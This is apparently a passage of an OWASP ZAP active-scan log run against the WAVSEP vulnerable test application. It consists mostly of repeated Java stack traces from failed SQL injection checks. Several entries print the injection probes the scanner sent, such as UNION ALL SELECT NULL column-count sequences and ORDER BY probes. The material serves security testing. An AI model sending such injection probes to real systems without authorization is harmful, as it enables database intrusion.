org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680959 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680960 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680961 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680962 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680963 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680964 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1707#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1707# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680965 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680966 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680967 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680968 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680969 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680970 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 